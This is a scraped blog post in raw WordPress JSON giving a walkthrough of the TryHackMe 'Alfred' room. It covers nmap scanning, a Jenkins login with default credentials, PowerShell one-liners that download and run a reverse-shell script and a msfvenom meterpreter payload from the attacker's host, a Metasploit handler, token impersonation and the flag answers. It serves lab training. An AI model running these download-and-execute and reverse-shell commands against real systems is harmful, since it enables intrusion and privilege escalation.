Target IP: 10.10.225.64<\/strong><\/p>\n To scan the target machine we use<\/p>\n [-p- to scan all ports we found 3 tcp ports open: 80, 3389, 8080 We visit 10.10.225.64:80 but we only find a Bruce W. picture,and nothing useful on the source code.<\/p>\n so we visit the 10.10.225.64:8080 and we found a log in page. Still on the webpage, we following the instruction we find the command line input under project\/configure\/build and we copy and edit the command in the command line<\/p>\n after, we download the file Invoke-PowerShellTcp.ps1 and from the downloaded folder we open server so we can transfer the payload<\/p>\n in another terminal we open a netcat listener<\/p>\n then go the the website interface and press build now <\/em>buttons to gain the shell<\/p>\n Loking back at the terminal we should have the shell, now we look for the flag which is in C:\\Users\\bruce\\Desktop; and after cat<\/em> the file we get <\/p>\n <\/p>\n On a new terminal paste and modify the following to create the file<\/p>\n then go on the attack machine and paste and adjust the code they provide<\/p>\n before execute the code we need to activate the meterpreter handle on the msfconsole (press enter after each line)<\/p>\n After the handle listener is set, we go back to the target powershell terminal and type<\/p>\n and we gained the shell with meterpreter<\/p>\n answer 5: 73802<\/strong> we can see that in the msfvenom section<\/p>\n <\/p>\n Still in meterpreter shell, Because whoami \/priv<\/em> doesn’t work we follow the second set of instruction and type<\/p>\n after to view the token availible<\/p>\n to use the token<\/p>\n and type the following to reveal the question<\/p>\n answer: NT AUTHORITY\\SYSTEM<\/strong><\/p>\n now for the final answer, we need to migrate to services.exe so to see the PID number type<\/p>\n we discover the PID wich is 668 so wr type<\/p>\n after we go the the C:\\Windows\\system32\\config folder and cat the root.txt to obtain the flag<\/p>\n final answer: dff0f748678f280250f25a45b8046b4a<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":" Alfred – Try Hack Me CTF Walk through Task 1 Target IP: 10.10.225.64 To scan the target machine we use nmap -p- -sV -sC -oN nmap-all -Pn 10.10.225.64 [-p- to […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"iawp_total_views":28,"footnotes":""},"categories":[38,45,44],"tags":[46,42],"class_list":["post-238","post","type-post","status-publish","format-standard","hentry","category-cybersecurity","category-ctf-challenge","category-tryhackme","tag-ctf","tag-try-hack-me"],"_links":{"self":[{"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/posts\/238","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/comments?post=238"}],"version-history":[{"count":3,"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/posts\/238\/revisions"}],"predecessor-version":[{"id":241,"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/posts\/238\/revisions\/241"}],"wp:attachment":[{"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/media?parent=238"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/categories?post=238"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/tags?post=238"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}nmap -p- -sV -sC -oN nmap-all -Pn 10.10.225.64<\/pre>\n
\n-sV\u00a0 to see the service version info
\n-sC script
\n-oN …. to output the result scan in a file (nmap-all)
\n-Pn treat all hosts as online (I usually to use it but this room suggested in case nmap had problem with the scan)]<\/p>\n
\nanswer 1: 3<\/strong><\/p>\n
\nAfter checking the default password for the Jenkins on the search engine we discoveer that admin is the username and after trying the password with the most used we discover that it is also the password.
\nanswer 2: admin:admin<\/strong><\/p>\npowershell iex (New-Object Net.WebClient).DownloadString('http:\/\/10.9.2.193:80\/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.9.2.193 -Port 1223<\/pre>\nsudo python3 -m http.server 80<\/pre>\n
nc -lvnp 1223<\/pre>\n
\nanswer 4: 79007a09481963edf2e1321abd9ae2a0<\/strong><\/p>\nTask 2 – Switching Shells<\/h2>\n
msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 --encoder x86\/shikata_ga_nai LHOST=10.9.2.193 LPORT=2323 -f exe -o shell-name.exe<\/pre>\n
powershell \"(New-Object System.Net.WebClient).Downloadfile('http:\/\/10.9.2.193:80\/shell-name.exe','shell-name.exe')\"<\/pre>\nuse exploit\/multi\/handler<\/pre>\n
set PAYLOAD windows\/meterpreter\/reverse_tcp<\/pre>\n
set LHOST 10.9.2.193<\/pre>\n
set LPORT 2323<\/pre>\n
run<\/pre>\n
Start-Process \"shell-name.exe\"<\/pre>\n
Task 3 – Priviledge Escalation<\/h2>\n
use incognito<\/pre>\n
list_tokens -g<\/pre>\n
impersonate_token \"BUILTIN\\Administrators\"<\/pre>\n
getuid<\/pre>\n
ps<\/pre>\n
migrate 668<\/pre>\n